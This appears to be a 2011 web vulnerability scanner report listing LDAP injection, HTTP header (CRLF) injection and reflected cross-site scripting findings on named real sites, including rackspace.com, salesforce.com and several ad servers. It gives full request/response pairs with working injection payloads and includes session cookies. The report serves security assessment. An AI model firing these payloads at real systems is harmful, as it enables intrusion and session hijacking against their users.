Date: Sat, 05 Feb 2011 16:05:49 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVUJ1bfy3T95WfOwfgImIi; Domain=htcwiki.wetpaint.com; Path=/
Location: http://htcwiki.wetpaint.com/search/everything/thread?contains=thread
Content-Length: 0
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:05:49 GMT
Connection: close
Content-Type: text/html


2.8. http://www.rackspace.com/whyrackspace/network/bandwidthbilling.php [exp_last_activity cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.rackspace.com
Path:   /whyrackspace/network/bandwidthbilling.php

Issue detail

The exp_last_activity cookie appears to be vulnerable to LDAP injection attacks.

The payloads 80f3942c7df929a3)(sn=* and 80f3942c7df929a3)!(sn=* were each submitted in the exp_last_activity cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /whyrackspace/network/bandwidthbilling.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=80f3942c7df929a3)(sn=*; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:29:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: keyword=cleanentry; expires=Sat, 05-Feb-2011 16:29:30 GMT; path=/; domain=.rackspace.com
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; expires=Sat, 05-Feb-2011 16:29:30 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 40836


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
"39941";
   var IS_dept                        = "MH_Sales_en_US";
   var IS_invite                    = "yes";
   
   var IS_UASrackuid                = "US4da9da571af9d6d58e6c524219e4d7f8";
   var IS_UAScmpc                    = "cleanEntry";
   var IS_UASreferrer                = "2f0f5a42a8503e776f91e0e5";
   var IS_PageName                    = "Why Rackspace: The Rackspace Network: Bandwidth Billing:";
       
   </script>
   
   
       
   <script src="http://www.google.com/jsapi" type="text/javascript"></script>

</head>

<body>


<div style="display:none">

   <script language="javascript" type="text/javascript" src="/includes/omniture/s_code.js"></script>

   <script language="javascript" type="text/javascript">
   
   s.pageName        = "";
   s.pageType        = "";
   s.server        = "www.rackspace.com";                            // Host Name
   s.channel        = "whyrackspace";                        // Pages Not Found
       
   s.prop1            = "";                                            // Site Sections (Level 2)
   s.prop2            = "";                                            // Site Sections (Level 3)
   s.prop3            = "";                            // Internal Search Terms
   s.prop4            = "173.193.214.243";                            // IP Address
   s.prop5            = "";                                            // Site Sections (Level 4)
   s.prop6            = "US4da9da571af9d6d58e6c524219e4d7f8";                        // SessionID
   s.prop7            = "";                                            // Broken Links
   s.prop8            = "";                                            // Site Sections (Level 5)
   s.prop9            = "";                                            // Download File Name
   s.prop10        = "";                                            // Download Page Name
   s.prop11        = "";                                            // Support Tools
   s.prop12        = "";                                            // Lead Form Abandonment
   s.prop13        = "";                                            // Search Origination Pages
   s.prop14        = "";                                            // Custom Links
   
   s.campaign        = "";                                            // Tracking Codes
   
   s.events        = "";
   s.state            = "";
   s.zip            = "";
   s.purchaseID    = "";
   s.products        = "";
   
   s.eVar1            = "";                                            // Internal Search Terms
   s.eVar2            = "";                                            // Sales Form Test
   s.eVar3            = "";                                            // Storage Page A/B Tests
   s.eVar4            = "";                                            // Lead Type
   s.eVar5            = "";                                            // Support Request Type
   s.eVar6            = "";                                            // Internal Campaigns
   s.eVar7            = "";                                            // Partner Name
   s.eVar8            = "";                                            // Download File Name
   s.eVar9            = "";                                            // Tracking Codes (Original Allocation)
   s.eVar37        = "D";                // Chat Slider Test
   
   </script>
   
       
       
   <script language="javascript" type="text/javascript">
   
       var s_c
...[SNIP]...

Request 2

GET /whyrackspace/network/bandwidthbilling.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=80f3942c7df929a3)!(sn=*; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:29:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: keyword=cleanentry; expires=Sat, 05-Feb-2011 16:29:31 GMT; path=/; domain=.rackspace.com
Set-Cookie: US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; expires=Sat, 05-Feb-2011 16:29:31 GMT; path=/; domain=.rackspace.com
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 41025


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
"39941";
   var IS_dept                        = "MH_Sales_en_US";
   var IS_invite                    = "yes";
   
   var IS_UASrackuid                = "US4da9da571af9d6d58e6c524219e4d7f8";
   var IS_UAScmpc                    = "cleanEntry";
   var IS_UASreferrer                = "http://www.google.com/search?hl=en&amp;q=2f0f5a4242353bda923acdd2";
   var IS_PageName                    = "Why Rackspace: The Rackspace Network: Bandwidth Billing:";
       
   </script>
   
   
       
   <script src="http://www.google.com/jsapi" type="text/javascript"></script>

</head>

<body>


<div style="display:none">

   <script language="javascript" type="text/javascript" src="/includes/omniture/s_code.js"></script>

   <script language="javascript" type="text/javascript">
   
   s.pageName        = "";
   s.pageType        = "";
   s.server        = "www.rackspace.com";                            // Host Name
   s.channel        = "whyrackspace";                        // Pages Not Found
       
   s.prop1            = "";                                            // Site Sections (Level 2)
   s.prop2            = "";                                            // Site Sections (Level 3)
   s.prop3            = "";                            // Internal Search Terms
   s.prop4            = "173.193.214.243";                            // IP Address
   s.prop5            = "";                                            // Site Sections (Level 4)
   s.prop6            = "US4da9da571af9d6d58e6c524219e4d7f8";                        // SessionID
   s.prop7            = "";                                            // Broken Links
   s.prop8            = "";                                            // Site Sections (Level 5)
   s.prop9            = "";                                            // Download File Name
   s.prop10        = "";                                            // Download Page Name
   s.prop11        = "";                                            // Support Tools
   s.prop12        = "";                                            // Lead Form Abandonment
   s.prop13        = "";                                            // Search Origination Pages
   s.prop14        = "";                                            // Custom Links
   
   s.campaign        = "";                                            // Tracking Codes
   
   s.events        = "";
   s.state            = "";
   s.zip            = "";
   s.purchaseID    = "";
   s.products        = "";
   
   s.eVar1            = "";                                            // Internal Search Terms
   s.eVar2            = "";                                            // Sales Form Test
   s.eVar3            = "";                                            // Storage Page A/B Tests
   s.eVar4            = "";                                            // Lead Type
   s.eVar5            = "";                                            // Support Request Type
   s.eVar6            = "";                                            // Internal Campaigns
   s.eVar7            = "";                                            // Partner Name
   s.eVar8            = "";                                            // Download File Name
   s.eVar9            = "";                                            // Tracking Codes (Original Allocation)
   s.eVar37        = "D";                // Chat Slider Test
   
   </script>
   
       
       
   <script language="javasc
...[SNIP]...

3. HTTP header injection  previous  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://create.wetpaint.com/scripts/wptrk [sn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://create.wetpaint.com
Path:   /scripts/wptrk

Issue detail

The value of the sn request parameter is copied into the Set-Cookie response header. The payload c05ff%0d%0a4e5b36c7f18 was submitted in the sn parameter. This caused a response containing an injected HTTP header.

Request

GET /scripts/wptrk?sn=c05ff%0d%0a4e5b36c7f18&v=20110120041852 HTTP/1.1
Host: create.wetpaint.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:00:08 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=8CB829864DFEBAF27580A4F19AA1591F; Path=/
Set-Cookie: wptrk="sn=c05ff
4e5b36c7f18
&i=1"; Domain=wetpaint.com; Path=/
Set-Cookie: wpptrk=gpvc=1&ab=0; Domain=wetpaint.com; Expires=Sun, 05-Feb-2012 16:00:08 GMT; Path=/
Set-Cookie: wpptrk2d=coppa=; Domain=wetpaint.com; Expires=Mon, 07-Feb-2011 16:00:08 GMT; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:00:08 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript;charset=UTF-8
Content-Length: 142


global_inits['SITES_COUNT'] = 1;
global_inits['AB_TEST'] = 0;
global_inits['GPVC'] = 1;

if (wetpaintLoad) wetpaintLoad('platform');

3.2. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload f0d45%0d%0afc099dc298 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /servlet/f0d45%0d%0afc099dc298 HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/f0d45
fc099dc298
/
Date: Sat, 05 Feb 2011 15:53:04 GMT
Connection: close
Content-Length: 91

The URL has moved to <a href="/servlet/f0d45
fc099dc298/">/servlet/f0d45
fc099dc298/</a>

4. Cross-site scripting (reflected)  previous  next
There are 609 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68fe2"><script>alert(1)</script>fb7584e1aad was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=68fe2"><script>alert(1)</script>fb7584e1aad&t=SZ0ow4Nphk6QF4pEA%2fVMyWaMT7jB%2b6YWlSbtq1MTlw4wwHhN8C4NevvUFcvC6BcllnpjtVTlx6Lo00KykqDZYlCIlwCpxQ0RPpuZrKYlf%2bQ%3d%7csdNiQEA8dhzYJiYNhzK0rFlA6psa777s5ejGP%2flK%2bQo%3d HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=83&mpid=1051202&fpid=-1&rnd=2858799619219382112&nu=n&sp=n
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3011330574290390485; adImpCount=FM4QLcaMabkQsarcOBMTT_qd1v3GGeBcoJK0MOl0KG-Y481wEkFtGX7HudJA1SwJY9n9GIWJHDTqbWbTuEexfNzeQdD3uMEbsSJGoH6nZcvCzn_rbeUw4N91a2HFDwx7Wl6PMIbl8VoYkne2SJkXTcTcqhcYEXFRrx1COjt-xQdPBFgEFn33aBMbAqV_0XEIioGKZSAftgkVYZTzRayYVmmTJdkIn7237siDdt9MzJqJi5T6FYiHf9o35IlREqTNFveKpsZQ30qpNKi15RJt04BNhaXhDlSq6EvznmypgJEkna5GLuKLpEu7eZEeTMi7F6sK_rp2soXzwueUGRFartfze4TUjaNUIXjW8HpTdIXW8uxzXCZHw_1hR9tJint6dsPDEFhRxd_Mub3GEI1LN-tHiIt90vCIZrFIVkRcrTHWSuqW6r5ZIwUtscKD_QT9RhXOUlzX0--TPsid5EqGlKaR8fzj-CgEMyGy4iMXI1WxKbXh9CKgY6S3LP_zmj75AgqPmyW7n-K57XLwzviwi0UeS0QSNHqXIchkIsQCETGT3yD6yFHAIahzcKETB33UwCPq2GhFCxYySztyqVkKk9fqbN4-YU4FEz0wwkD5vsFOGK_87tDq8e92tNo34emrEgGEUj-NO1cCBiKRN0KNH1ftcOyrV1OLoU5x9aMp-92fSDdx8Pm4E6I95eyuD_EIQOJmu9RYL7YOIJ6DsZdIlrLgwokXGxtO8_jRpe316oYDuH7CMSEB_S7o6Xm3tvDBfH77IJVG0N6dycTdcjtOKF0Cz2TbSViJ-oT4nVLBUOQ7zE-OOnjPRQ6BZXJCY0oCMrkBfNspHfysXvb7GqOmGNAITbT7Z6AmMx12CVhoBV8PCKPJoslzeIPsOadDQ5GApTHEeUcb_20FLCe61hOZos4ND7pDMbh_Nz4asivfvnRRu_fmnuOn7vvqoBU15Zmhn2aVSJry2cIXXaBci8YswRWnz3-1lFmH8NpHbFKrPy3hBObtf8ALhKpons6mVN9Ng_E4yJzpnqztVh_CB-KMHlM4At-mEES-WC-9xjj3t3cnzJw50Wq6BglWv58k-98YkSbTm3kPOUdWBiWoLi0oN0AgeHAdeFjGHSfjDkMzE5p5e_oJDB2Um-liToPNlmN15FjrbRSBV8G9GwEgDofeTOxem0_gMApf3YWMEr3kQAQnXe4HjQMTBDROpzYRLGofXKwaWNtdj1-GtHzOUqyENh2k1W2pFwJOjkpENaGP0tqhG0BtDC_eTH_Ts10GvA6WhyC22lBHkEPeNKFx7RiTWcHRNLuEX2-svGHkdhG53xdJo9qHwXLy45nY7LSpUbn803gUXikBp5CFzTHxBLV0jIUUb9PGuTCtW-hvx86uIjCl7RrDpkAZSszkN92RjKcOSHyDTphfUd0ZqQTAbIYvZtNr_wQwmIEY35OpKNWhyGwNPlAh_ANj4laYRoTBJxnGQ7wgWZt0CSpxlrfASU5W2a6su59vlF-h6V4zet13tlPhRMEiyYm825vPff2nJDmVgFpIKs_vIo7sFsppJ43d8oTEgInxyFT6vScD8wD9aZjmMC0w6HS0HlWcNr1j-PhGS2ikng608Ubz0iz0TtbwhgQZq5IdyfSisA1KqAwL3sZErWVr76O0bqQTEPkhkBBP4vNeu_uKiDKKl73FedJ05pAh6qV14YUcXNrVmSSI1FzEzQ65n9aZSqRKUiLFvw0_FzJQi642bOf20jjwau1yNWbWc_OZc_OPEEY_dnkrDVdmeoMCTOxN_xl7C-3y_RTPHX8tA53fNzl8qfH897V8IhWPCe1DLrZ9lRQtTCZwINCJg6hyABA61hUJaqPVyX7fV7Pa1PW0-yYXb_USKuin2pZCaBr_uY_2UBH6Bm4UktJmd6sVQvXXEqhe9E5LsneRLFWbUdQszzXxD5egB584f5Iq0VaWXCofBTTX6PHG8K6lFCCN0TTnR1jCog1stnuLrLH_TLw0g_9l8j595C25K_O7nXuUqzkznnHJS2oIivO1MtzkhTD8tggahFLAwdtimGiAzgIbfwh3tPXiXBZiPEc6jmaSPplk32IRb7Tl08IFN1OghxmtWT_y47n5TtZS9Ky93uZuiaOzgh6RPqobZokxjCycBjwJJ-OqeZ3YCRoZ5XICuXWVHfipzGbbMT7XgVwScM8a1QBrHN9hJ559oPfWNXLGQYJF8WI3xWHXIXB86oJHZOjQy7IdFPhSTsF2yrOAh9s72IpPTbIy0ryOZR5kHQoGKZaDQPufKDCKOsAs5UyVIQTo0ztnk49jL0nNFaq4usSu0TQiqXjP7CIAd_5FtzMDApKZjTZ9VwWqS_hi3W5FLLAcz8HdwETYSzM0iqfAGlpVHegt_TIDru8ZVGlo2JchDi2BE0kETeswJqfjIM8eqB1CZXkSQ7Z_VjVnYvzBVNyB9AksqD2lQZb2X0IEqN843HNpf9LL79Gl1KBsoCUhcPx0GvFd6LDM_NesCTjn8qfPanRhqfFt_Mz5uEh2A3HFoGkf8ppxZxL6925r_GgrDoF5KcCR0z_dNX3kzjeRcgqW8BhR69hQhpeZrZnEJ52ohaD3WrTkTUj4YJ6Td6PLaDgaJxtMnnZrfAlG0SSD0cpxrho96Q5aYPi9en1l66z-sdlCvM2HwHHvukFOG1d5EaBIpvNzbIjvRqOmzYDhYzHqcbaWBj06fa97gFmB5jdUYj5pSK3CD2Yuk0PK5FYetxUklFsdind5sgdq4uZcD2KLx9Zf7jaxnwz6suaPAnsGTiQgiUvKmhf1LhrytQYKxDy-h4T29iDJXVr_vHZNnZTSMo3FOqO76V7e32Mz948gl-62XtaGUS8uw5NCpnBNXGUaigKHIg84ueIc4t5Yp3YWsvWh2i358DyJOyzgpnBHfTKfL-U_Busa7oEsjSep6DjzyTifPlN_P4smDk3kLq_iHqbXQ5svnKXdR0fKJFj2seLH8BbDFMsPiVsBIQ44v1dSgCalvY0FxkkJ5w0OZeWQP34jwLIAF168EspxmNyBZAxjbmEt8kjG7dRMykkE2LHXhz6x23r28D5B1-HnnnOalxwc8pVPIG67O2v9MtuGBypG0oO1sVM2Vbs7HFOP9G8F0R3RxUgEDCioFUEKPhCNOF99OExqDKIS0y-D3H8kAPjeIydjzyH2Ws7PKyE1dGY4WEg1BMpUBtxwX2H-7BKKuqPq2iSXQ7keQevoGn3niEhwrkx3I523rYfTIHt_4ntge3wT6HrPHWBJpD6Hr91CxZq9sV9Jmp33y8raIDjGaQc_8c0sEToR_ODvxgcgJ32KFhukOoA2cRquiPMf-CiwpIi4ayv6yWP-tXJ__VAnBFQL8j9ZaHEtyQCLoYLPIaWZ3CmWGBp_xNH3WlqbXOyrf_ATBbMNQCTCxOAxrjPhFf5rtBKDWKm24urmdIW_ZXAbYCZmLsz6YiVpaNRjSC9cVWjph0vEeVDn94cCqpnjE0z1BuYxXU6aN8KvfgQRgY4ZaCnGHk-ja9faWwfL-_-bPH3YFMHRKzulr4fOZJphXH_Th5iLN0VczjS8Jh9TEFyiFtC1iUdTIWwbUQ3HeHZgtn1yA0PmWEs3TAjOPMDh8jx0WcV7eT-TG33S7CRXLm9kG5yXyNmxCrzJ; fc=8Kodsw1QIRNJBnpSjhgJ0uErbJkTJYsNaCBFpaSI5yP-4Y1aL5T0hqj7dZyIiRNIWMZgDtcnKM_xOWbKnaMIO3_WyzVPxgN3VkTg_cPuFqziwJJKZupkpjfaBrjFc6z7RfOX1MD02-o6SZ1b0c_HcUiZ1Q4B83ZCB0ZNq2R2Ygc; pf=vcPDWdxa5bRnzYCFna8dt7hwFpEjJFamBf-ed9eCgkru2q8_Jo62qDoNU1sRcsTDbsXLbP8cgvu5kdFpiCdvW34lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15011%7C15011%7C15009%7Cundefined%7C15011%7C15011%7C15011%7C15011%7C15011%7C15011%7C15011%7C14983%7C15011%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 04-Aug-2011 15:59:34 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 15:59:33 GMT
Content-Length: 546

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=2411131155077842345&fpid=68fe2"><script>alert(1)</script>fb7584e1aad&nu=n&t=SZ0ow4Nphk6QF4pEA%2FVMyWaMT7jB%2B6YWlSbtq1MTlw4wwHhN8C4NevvUFcvC6BcllnpjtVTlx6Lo00KykqDZYlCIlwCpxQ0RPpuZrKYlf%2BQ%3D%7CsdNiQEA8dhzYJiYNhzK0rFlA6psa777s5ejGP%2FlK%2BQo%3D&sp=n&purl="
   marginwidt
...[SNIP]...

4.2. http://ads.addynamix.com/creative/2-2126953-88j [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.addynamix.com
Path:   /creative/2-2126953-88j

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79ca0'-alert(1)-'7a99b6b9948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /creative/2-2126953-88j??79ca0'-alert(1)-'7a99b6b9948=1 HTTP/1.1
Host: ads.addynamix.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-btf?t=1296921576218&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UC=1.0.20050_0_1106.0; PI2126953_85=I4d4d644cJ2K2L0M2N1O15180

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:34 GMT
Server: Apache
Server-Index: i1
P3P: policyref="http://banners.pennyweb.com/w3c/p3p.xml",CP="NON STP DSP COR CUR TAI OUR STA"
Pragma: no-cache
Cache-Control: no-store,no-cache
Set-Cookie: PI2126953_88=I4d4d73e6J63b0K77064L2eM1960dN1O15180; expires=Sun, 06-Feb-2011 15:59:34 GMT; path=/; domain=ads.addynamix.com
Content-Length: 734
Connection: close
Content-Type: text/html
Expires: Sat, 05 Feb 2011 15:59:34 GMT

document.writeln('<'+'scr'+'ipt'+'>'+'\nvar tmNetworkID = 5132;\nvar tmPlacementID = 1229906;\nvar tmBannerSize = 225;\nvar tmBannerConfig = "iframe";\nvar tmExpandConfig = "auto";\nvar tmClickUrl = "http://ads.addynamix.com/click/2-2126953-88-77064-103949-1296921574??79ca0'-alert(1)-'7a99b6b9948=1target=";\n<'+'/scr'+'ipt'+'>
...[SNIP]...

4.3. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 5ca84<script>alert(1)</script>e6063e28591 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=W25t6coj820hSGmI5ca84<script>alert(1)</script>e6063e28591 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://htcwiki.wetpaint.com/
Accept: */*
